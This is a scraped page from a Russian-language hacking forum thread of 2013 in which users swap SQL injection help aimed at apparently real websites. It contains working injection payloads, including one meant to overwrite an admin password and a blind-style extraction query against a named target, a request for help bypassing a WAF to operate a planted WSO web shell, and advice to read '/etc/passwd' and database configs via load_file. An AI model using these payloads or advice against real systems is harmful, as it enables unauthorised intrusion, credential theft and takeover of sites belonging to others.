Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Hapk

    Hapk Banned

    Joined:
    3 Jun 2011
    Messages:
    290
    Likes Received:
    42
    Reputations:
    -5
    вот так?
    http://site.ru/index.php?id=123'+UNION+SELECT+1,2,3,admin,5,6,7,8,9,10,11,12,13,14,15,16,17,18 UPDATE 'admin' SET 'password' = '123' WHERE username='admin'+--+
     
    #22821 Hapk, 12 Dec 2013
    Last edited: 12 Dec 2013
  2. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    тебе ж сказали, в майскул разделение запросов работать небудет, ты хоть читаешь что тебе пишут или нет?
     
    1 person likes this.
  3. Hapk

    Hapk Banned

    Joined:
    3 Jun 2011
    Messages:
    290
    Likes Received:
    42
    Reputations:
    -5
    Бля не так просто понял!
     
  4. BOSS

    BOSS Member

    Joined:
    15 Jun 2010
    Messages:
    86
    Likes Received:
    5
    Reputations:
    0
    Подскажите какая веб-уязвимости сейчас являются наиболее распространенными? Очень хочется начать изучать веб-уязвимости, но естественно хочу начать с актуального и распространенного.
     
  5. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Сбербанк, С count(*) сложнее, но данные можно выводить:
    Code:
    lan=3&pid=0%26(([COLOR=Yellow]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21[/COLOR])>(SELECT*FROM([COLOR=DarkOrange]SELECT*FROM information_schema.tables LIMIT 1[/COLOR])a1 WHERE @:=[COLOR=Red]ascii(mid(TABLE_SCHEMA,1,1))[/COLOR]))UNION(SELECT @)&type_id=2&raznovid=2&num_set=undefined
    
    Возвращает код первого символа имени базы данных. Остаться выяснить ограничение длины у фильтра на число и можно приступать. :)

    sabe, Здесь нормальный вывод, не blind. Если у вас получиться упростить запрос - это хорошо, но на некоторых запросах БД может надолго зависнуть, осторожно.
     
    #22825 randman, 13 Dec 2013
    Last edited: 13 Dec 2013
    1 person likes this.
  6. -=Cerberus=-

    -=Cerberus=- κρυπτός γράφω

    Joined:
    29 Apr 2012
    Messages:
    1,321
    Likes Received:
    930
    Reputations:
    391
    Доброго времени суток ачатовцы!

    подскажите как обойти Incapsula WAF
    есть шелл WSO. Пытаясь его открыть, когда как, то пускает, то нет, но оказавшись внутри не могу ничего исполнить сразу ловлю бан. Админки прикрыли, так что шелл последняя зацепка.

    может быть кто нибудь сталкивался с этим зверем и есть решение?

    судя по отчету сравнительного тестирования Incapsula WAF vs CloudFlare пробелы в защите имеются

    ХЭЭЭЛППП МИ!!!

    p.s Эта хрень таскает по всему сайту свои кукисы, может быть валидность вызываемых страниц сайта завязана на поле Referer и этих куках
     
    #22826 -=Cerberus=-, 13 Dec 2013
    Last edited: 13 Dec 2013
  7. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    Code:
    https://e-pay.by/https://e-pay.by/?invaliduser
    https://e-pay.by/https://e-pay.by/
    https://e-pay.by/https://e-pay.by/news?page=9
    что это такое?
     
  8. MrKloud

    MrKloud New Member

    Joined:
    3 Jan 2012
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Добрый день! Пытаюсь посмотреть, есть ли файловые привилегии у юзера, но пишет, мол в доступе отказано.
     
  9. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    если используешь запрос по выборке и кавычек нет, то к нужной записи в колонке надо хексить, пример:
     
    _________________________
  10. MrKloud

    MrKloud New Member

    Joined:
    3 Jan 2012
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    То же самое.
     
  11. zombak18

    zombak18 New Member

    Joined:
    2 Oct 2011
    Messages:
    34
    Likes Received:
    1
    Reputations:
    0
    Как можно записать, чтобы значение было больше определнного..
    К примеру where value=больше50
    Что то понять не могу как это записать :)
     
  12. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    Тебе сюда :)
     
  13. zombak18

    zombak18 New Member

    Joined:
    2 Oct 2011
    Messages:
    34
    Likes Received:
    1
    Reputations:
    0
    :D
    догадался после того, как отправил здесь сообщение
     
  14. eclipse

    eclipse Member

    Joined:
    19 Dec 2010
    Messages:
    155
    Likes Received:
    74
    Reputations:
    85
    +++ Молодец, прогрессируешь! :D
     
  15. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Посмотрел скуль в личке, все просто))) там просто нет доступа к mysql.user, по этому и нет файловых привилегий! модераторы, почистите от оффтопа
     
    _________________________
  16. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Есть у меня ссылка одна, там есть sql injection, раскрутил, узнал имена бд, лезу в бд а там какие-то тех. данные и больше ничего.
    На самом сайте есть форма авторизации для зареганых пользователей, а вот куда ихние данные могут записываться?
     
  17. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    либо плохо искал, либо из файла
     
  18. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    а к файлу как можно доступ получить? или хотя бы узнать где он?
     
  19. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    если файл прив нету то никак
     
  20. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    Необязательно, можно попробовать load_file('/etc/passwd'), если сработает можно попробовать прочитать конфиги мускула и тд
     
Thread Status:
Not open for further replies.